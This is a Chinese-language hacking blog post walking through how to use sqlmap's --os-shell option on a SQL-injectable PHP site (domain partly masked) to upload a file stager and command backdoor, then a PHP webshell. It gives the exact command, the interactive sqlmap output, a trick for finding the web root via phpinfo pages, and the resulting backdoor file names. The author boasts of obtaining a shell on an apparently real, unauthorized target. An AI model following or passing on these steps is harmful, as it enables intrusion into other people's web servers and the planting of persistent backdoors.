sqlmap注入点上传shell

- 这个方法我也是刚刚才发现..

借鉴于九区的文章:http://fuzzexp.org/newly-discovered-sqlmap-upload-files-a-bug-2.html

俺稍微改了一下 - = 凑合着用 反正我特么的拿到shell了.

记录开始.

sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell

[14:39:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, PHP 5.2.9
back-end DBMS: MySQL 5.0
[14:39:11] [INFO] going to use a web backdoor for command prompt
[14:39:11] [INFO] fingerprinting the back-end DBMS operating system
[14:39:12] [INFO] the back-end DBMS operating system is Windows
[14:39:12] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>

当然 这个是php的站 我们选择3 PHP (default)

[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot
/]:

不知道路径咋办呢 - - 用扫描器扫扫目录底下的phpinfo.php或者别的文件名 看下路径

得到路径之后填写到刚跳出来的那个里面

[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot
/]:E:/Web/ygbh

然后回车之后又跳几行 就是让你选择上传在哪个目录 我们就直接回车 不管它 默认空着就好

[14:44:35] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [E
nter for None]:

接下来回车之后 sqlmap变成这样

[14:45:53] [INFO] the file stager has been successfully uploaded on 'E:/Web/ygbh
' ('http://www.****.cn:80/tmpuodot.php')
[14:45:53] [INFO] the backdoor has probably been successfully uploaded on 'E:/We
b/ygbh', go with your browser to 'http://www.****.cn:80//tmpbcmnd.php' and enjoy
it!
[14:45:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

- - tmpuodot.php tmpbcmnd.php 你会发现有俩文件！！ 是两个文件！！九区那个估计是看走眼了

一个是上传的文件！ 一个是执行cmd的文件！是俩文件！

打开http://www.****.cn/tmpuodot.php 上传我们自己的php马 - = 另外一个不管它

完!